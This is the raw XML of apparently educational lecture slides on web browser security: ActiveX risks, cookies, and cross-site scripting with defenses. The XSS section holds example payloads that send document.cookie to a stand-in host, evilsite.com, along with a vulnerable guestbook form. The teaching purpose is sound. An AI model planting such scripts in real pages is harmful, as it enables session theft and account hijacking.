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30"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="329" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="279" r:id="rId9"/>
    <p:sldId id="330" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="331" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="312" r:id="rId16"/>
    <p:sldId id="313" r:id="rId17"/>
    <p:sldId id="318" r:id="rId18"/>
    <p:sldId id="332" r:id="rId19"/>
    <p:sldId id="333" r:id="rId20"/>
    <p:sldId id="327" r:id="rId21"/>
    <p:sldId id="328" r:id="rId22"/>
    <p:sldId id="326" r:id="rId23"/>
    <p:sldId id="334" r:id="rId24"/>
    <p:sldId id="335" r:id="rId25"/>
    <p:sldId id="336" r:id="rId26"/>
    <p:sldId id="322" r:id="rId27"/>
    <p:sldId id="323" r:id="rId28"/>
    <p:sldId id="324" r:id="rId29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06" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-93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303213"/>
            <a:ext cx="1588" cy="13331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503238" y="4316413"/>
            <a:ext cx="5851525" cy="405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46088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68825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37100" cy="3514725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7827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37100" cy="3514725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885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37100" cy="3514725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503238" y="4316413"/>
            <a:ext cx="5853112" cy="40608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F14672-90F8-42A6-BF23-B3CC3A4C326E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D7CEB-5F27-4360-868B-C74D69315E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9376CB-01FB-4968-AAD1-2B4CD12C61E5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596C6-4BE6-4643-B6DA-8F451AA359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5F6ED-C4B8-4B76-9802-CF1E10EEBF9D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F6C4D-F80F-4A34-8BA1-9C13B9A645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DFCFA0-EEA5-43D0-A565-FC0AD80A5C6E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BD6E5-948C-41C0-86B8-90ABF3B25B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07C6B3-5E21-4364-96E7-ADF7352A255F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2D073-80D8-475F-9679-E922988A59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6FB3B0-3FC6-4974-AC78-F9C44952BE91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CE156-3808-4DF7-AA03-80E5B3139B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BAA7A4-CF77-434A-BBFC-2866387D73E4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6C85E-AF5C-439A-A7D7-4DBAC53B82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FC6DF4-49C3-4FC8-AB44-8049D098C13C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A5686-D8A9-42D3-8DDE-AFA5DEDEB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D3F1C2-225F-4DE3-BD9A-FBB2AB455EEA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B6E8C-1F1D-47B0-8B1B-690F03B8FF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57DE2-C66E-4348-8640-DA1B19F50410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5953B-ECC8-4BC6-9F84-7CEA585BCF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7057A-636E-4E2D-B385-E24643C8FC42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A6992-BB7B-4680-A8D5-6F813235A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A48692A-69FA-4C91-8762-853FF8F67D3A}" type="datetime1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CDCD2D7-74E4-423C-8C78-71A7467B23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lcyon.com/mclain/ActiveX/Exploder/FAQ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nti-phishing.com/phishReportsArchiv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ti-phishing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usted_site.com%01%00@malicious_site.com/maliciou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nti-phishing.com/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D43496-12BC-49B5-B68C-B810E3AA29A9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D7CEB-5F27-4360-868B-C74D69315E0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83225"/>
            <a:ext cx="8229600" cy="72423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Embedding an ActiveX Control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88107"/>
          </a:xfrm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&lt;HTML&gt; &lt;HEAD&gt;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&lt;TITLE&gt; Draw a Square &lt;/TITLE&gt;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&lt;/HEAD&gt;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&lt;BODY&gt; Here is an example ActiveX reference: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OBJECT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solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="Sample“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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CODEBASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="http://www.badsite.com/controls/stop.ocx"  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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEIGHT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="101“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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WIDTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="101“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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLASSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="clsid:0342D101-2EE9-1BAF-34565634EB71" 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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PARAM NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="Version" VALUE=45445"&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PARAM NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ExtentX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>" VALUE="3001"&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PARAM NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ExtentY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>" VALUE="2445"&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/OBJECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;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&lt;/BODY&gt; &lt;/HTML&gt;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5F33-ADDE-4B78-B640-A6F0753433E0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8F94A-6DD1-4C33-B942-4E0B948CA5B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Authenticode in ActiveX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676400"/>
            <a:ext cx="3505200" cy="4648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This signed ActiveX control ask the user for permission to run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approved, the control will run with the same privileges as the user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“Always trust content from …”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> checkbox automatically accepts controls by the same publisher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Probably a bad idea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48CBF9-410E-4235-9CE4-A8813B78C4BB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EB5D0-E910-471F-936C-4B5D1889B91A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0800" y="1676400"/>
            <a:ext cx="5130800" cy="3848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40" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4178300" y="5791200"/>
            <a:ext cx="4495800" cy="323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750"/>
              </a:spcBef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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious Mobile Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, by R. Grimes, O’Reilly Books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84019"/>
            <a:ext cx="8229600" cy="72423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Trusted/Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ActiveX controls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Trusted publishers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List stored in the Windows registry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Malicious ActiveX controls can modify the registry table to make their publisher trusted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future controls by that publisher run without prompting user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Unsigned controls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prompt states that the control is unsigned and gives an accept/reject option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Even if you reject the control, it has already been downloaded to a temporary folder where it remains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It is not executed if rejected, but not removed either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AA5094-4C6E-4643-8042-689F5C465D9C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/17/2010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44CD6-47BE-440D-9C42-ECE05FD42222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 ActiveX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i="1" dirty="0" smtClean="0"/>
              <a:t>Exploder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>Runner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> controls designed by Fred McLain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Exploder was an ActiveX control for which he purchased a VeriSign digital signature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The control would power down the machine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Runner was a control that simply opened up a DOS prompt While harmless, the control easily could have executed format C: or some other malicious command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olidFill>
                  <a:srgbClr val="CCCCFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.halcyon.com/mclain/ActiveX/Exploder/FAQ.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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i="1" dirty="0" smtClean="0"/>
              <a:t>Quicken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> exploit by a German hacking club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Intuit’s Quicken is personal financial management tool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Can be configured to auto-login to bank and credit car sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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The control that would search the computer for Quicken and execute a transaction that transfers user funds to their account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DFCFA0-EEA5-43D0-A565-FC0AD80A5C6E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BD6E5-948C-41C0-86B8-90ABF3B25B4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93725"/>
            <a:ext cx="8232775" cy="50641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Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3072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051494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Cookies are a small bit of information stored on a computer associated with a specific server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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When you access a specific website, it might store information as a cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Every time you revisit that server, the cookie is re-sent to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Effectively used to hold state information over sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Cookies can hold any type of information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Can also hold sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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This includes passwords, credit card information, social security number, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Session cookies, non-persistent cookies, persistent cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="87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Almost every large website uses cookies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A38B9-453E-4799-B89F-4E600C38BF19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52184-1E1A-4F9C-A1E4-E3C54FE35119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93725"/>
            <a:ext cx="8232775" cy="504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More on Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317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825937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Cookies are stored on your computer and can be controlled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However, many sites require that you enable cookies in order to use the site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Their storage on your computer naturally lends itself to exploits (Think about how ActiveX could exploit cookies...)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You can (and probably should) clear your cookies on a regular basis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Most browsers will also have ways to turn off cookies, exclude certain sites from adding cookies, and accept only certain sites' cookies</a:t>
            </a:r>
          </a:p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Cookies expire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The expiration is set by the sites' session by default, which is chosen by the server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This means that cookies will  probably stick around for a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9DB25-0029-4604-BA91-714174D2BB33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488CD-9996-4A56-A840-A62EEB19979E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93725"/>
            <a:ext cx="8232775" cy="504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Taking Care of Your Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327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2974975" cy="4364272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Managing your cookies in Firefox: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Remove Cookie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Remove All Cookies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Displays information of individual cookies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Also tells names of cookies, which probably gives a good idea of what the cookie stores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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i.e. amazon.com: session-id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1E19C5-8C81-428D-9BBF-5E55309B0B40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2D292-B329-4853-816E-352177D3294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327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1371600"/>
            <a:ext cx="52578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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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Attacker injects scripting code into pages generated by a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Script could be malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Threats:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising , execution of code on the client, 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53F20-9A30-4F11-B77E-65C18FAE9941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5E557-31DD-47CF-A95C-361EE60339C7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419600" cy="5181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Website allows posting of comments in a guestbook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Server incorporates comments into page returned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&lt;html&gt;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&lt;body&gt;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&lt;title&gt;My Guestbook!&lt;/title&gt;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Thanks for signing my guestbook!&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> /&gt;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Here's what everyone else had to say:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> /&gt;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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Joe:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Hi! &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /&gt;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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello, how are you? &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /&gt;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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jane:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> How does this guestbook work? &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /&gt;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smtClean="0"/>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker can post comment that includes malicious JavaScript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600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evilguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: &lt;script&gt;alert("XSS Injection!"); &lt;/script&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /&gt;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67200"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guestbook.html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&lt;title&gt;Sign My Guestbook!&lt;/title&gt;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Sign my guestbook!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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> action="sign.php" method="POST"&gt;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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" name="name"&gt;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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" name="message" size="40"&gt;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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>" value="Submit"&gt;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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form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DFCFA0-EEA5-43D0-A565-FC0AD80A5C6E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BD6E5-948C-41C0-86B8-90ABF3B25B4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Stealing XSS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Attack 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> = "http://www.evilsite.com/steal.php?cookie="+document.cookie;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> = new Image();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>img.src = "http://www.evilsite.com/steal.php?cookie=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie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&lt;/script&gt;</a:t>
            </a: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6FB3B0-3FC6-4974-AC78-F9C44952BE91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CE156-3808-4DF7-AA03-80E5B3139B3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HTML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solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hypertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>markup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> language (HTML)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 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Describes the content and formatting of Web pages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Rendered within browser window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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HTML features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Static document description language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Supports linking to other pages and embedding images by reference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User input sent to server via forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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HTML extensions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Additional media content (e.g., PDF, video) supported through plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mbedding programs in supported languages (e.g., JavaScript, Java)  provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content that interacts with the user, modifies the browser user interface, and can access the client computer environment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93BC39-A668-4F5A-88D1-FC15C7AE25DA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53BF-E8C4-4DC2-841C-397A68C3294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>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3900" dirty="0" smtClean="0"/>
              <a:t>Another XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389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2600" dirty="0" smtClean="0"/>
              <a:t>Mallory finds that Bob’s site is XSS type 1 vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Mallory makes a tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>to use this vulnerability and sends to Alice an email pretending to be from Bob with the tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Alice uses the tampered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>at the same time while she is logged on Bob’s site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The malicious script is executed in Alice browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2600" dirty="0" smtClean="0"/>
              <a:t>nbeknown to Alice, the script steals Alice’s confidential information and sends it to Mallory’s site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19514F-5C45-48F7-8D45-AFC7EE01B23F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BD4F8-FEA3-4C3D-A0C3-077F182D7F7C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smtClean="0"/>
              <a:t>Client-side XSS defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39942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sz="2300" dirty="0" smtClean="0"/>
              <a:t>Proxy-based: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Analyze HTTP traffic between browser and web server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Look for special HTML characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Encode them before executing the page on the user’s web browser (i.e. </a:t>
            </a:r>
            <a:r>
